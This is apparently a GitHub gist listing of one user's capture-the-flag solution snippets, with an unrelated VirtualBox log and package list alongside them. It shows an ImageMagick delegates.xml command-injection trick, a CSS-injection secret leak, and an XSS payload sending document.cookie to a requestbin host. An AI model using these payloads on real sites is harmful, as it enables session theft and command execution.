Open help chat and wait until user list is shown.
Call to user and say “Anyaway, what is your favorite food?”.
You will get flag.
tyage tyage
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $home = '/tmp/84d99af2ce44bb1dd3398190b930c8ac'; | |
| ini_set('display_errors', 1); | |
| mkdir("$home/.magick/"); | |
| file_put_contents("$home/.magick/delegates.xml", "<delegatemap><delegate decode=\"foo\" command=\"/readflag > $home/flag\"/></delegatemap>"); | |
| mkdir("$home/.config/"); | |
| mkdir("$home/.config/ImageMagick"); | |
| file_put_contents("$home/.config/ImageMagick/delegates.xml", "<delegatemap><delegate decode=\"foo\" command=\"/readflag > $home/flag\"/></delegatemap>"); | |
| touch("$home/test.foo"); | |
| $_ENV['HOME'] = $home; |
tyage
/ raddit.php
Last active
April 1, 2020 03:33
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $encrypted_block = 'PKklQOstCkI='; | |
| $message = ''; | |
| $charset = '_-abcdefghijklmnopqrstuvwxyz0123456789'; | |
| $str_length = strlen($charset); | |
| $method = 'DES-ECB'; | |
| function check($flag) { |
tyage
/ docker-compose.yml
Created
August 25, 2018 14:00
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| version: '3' | |
| services: | |
| dockerauth: | |
| image: cesanta/docker_auth | |
| ports: | |
| - "5001:5001" | |
| volumes: | |
| - ./config:/config:ro | |
| - ./log:/logs |
tyage
/ catchat.js
Created
June 23, 2018 12:11
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| prefix = 'L0LC47S_43V3R' | |
| grecaptcha.execute(recaptcha_id, {action: 'report'}).then((token) => send('/report ' + token)); | |
| setTimeout(() => { | |
| fetch(`send?name=${encodeURIComponent('/secret wao; Domain=a.cat-chat.web.ctfcompetition.com')}&msg=dog`) | |
| }, 2000); | |
| setTimeout(() => { | |
| let payload = '' | |
| for(let i = '0'.charCodeAt(0); i <= '9'.charCodeAt(0); ++i) { | |
| let a = String.fromCharCode(i) | |
| payload += `span[data-secret^=${prefix}${a}]{background:url(./send?name=a&msg=flag%20${a})}` |
tyage
/ h4x0rs.date
Created
May 29, 2018 03:23
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script>location.href="//requestbin.fullcontact.com/15g8ko51?"+document.cookie</script> | |
| <iframe src=/profile.php?id=c7ab51c5bdeec6bc6068d8a643a29907a1b7c71acb455454381fe7320cd5283e id=msg csp="script-src 'unsafe-inline';"> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| VirtualBox VM 5.2.10_Ubuntu r121806 linux.amd64 (Apr 26 2018 08:49:04) release log | |
| 00:00:00.267421 Log opened 2018-05-26T05:35:20.048575000Z | |
| 00:00:00.267422 Build Type: release | |
| 00:00:00.267424 OS Product: Linux | |
| 00:00:00.267425 OS Release: 4.15.0-22-generic | |
| 00:00:00.267425 OS Version: #24-Ubuntu SMP Wed May 16 12:15:17 UTC 2018 | |
| 00:00:00.267439 DMI Product Name: System Product Name | |
| 00:00:00.267443 DMI Product Version: System Version | |
| 00:00:00.267471 Host RAM: 32165MB (31.4GB) total, 30320MB (29.6GB) available | |
| 00:00:00.267473 Executable: /usr/lib/virtualbox/VirtualBox |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| alert(1) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ~ ᐅ brew cask list | |
| adobe-acrobat-reader firefoxnightly gyazo mactex skype xquartz | |
| adobe-air font-source-code-pro hex-fiend maltego slack zeplin | |
| android-studio github-desktop intellij-idea-ce mendeley tex-live-utility zoomus | |
| atom gnucash iterm2 minecraft vagrant | |
| discord google-chrome java mysqlworkbench virtualbox | |
| docker google-drive java8 night-owl vlc | |
| dropbox google-japanese-ime jd-gui obs vysor | |
| firefox google-nik-collection limechat skim wireshark | |
| ~ ᐅ brew list |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # -*- coding: utf-8 -*- | |
| import os | |
| import sys | |
| import random | |
| import json | |
| import cgi | |
| import cv2 |